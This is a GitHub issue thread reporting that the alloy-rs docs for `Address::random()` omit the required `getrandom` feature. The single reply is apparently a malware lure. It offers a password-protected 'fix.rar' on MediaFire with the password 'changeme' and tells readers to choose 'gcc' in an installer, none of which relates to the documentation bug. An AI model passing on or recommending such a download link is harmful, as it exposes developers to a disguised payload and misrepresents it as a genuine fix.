### ISSUE TITLE
[Bug] Documentation for `Address::random()` doesn't indicate `getrandom` feature is required

### ISSUE THREAD

**Issue by jmininger** [alloy-rs/core#714]
### Component

primitives

### What version of Alloy are you on?

0.2.1

### Operating System

Linux

### Describe the bug

I had `alloy-0.2.1` with `features=["full"]` in my `Cargo.toml` but was unable to use `Address::random()`. Upon closer inspection it looks like this method is generated via  macro, and that it requires the `getrandom` feature. This is not documented in the docs.rs, and this lack of documentation unfortunately resulted in it taking slightly longer than I would have liked to get my code running

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
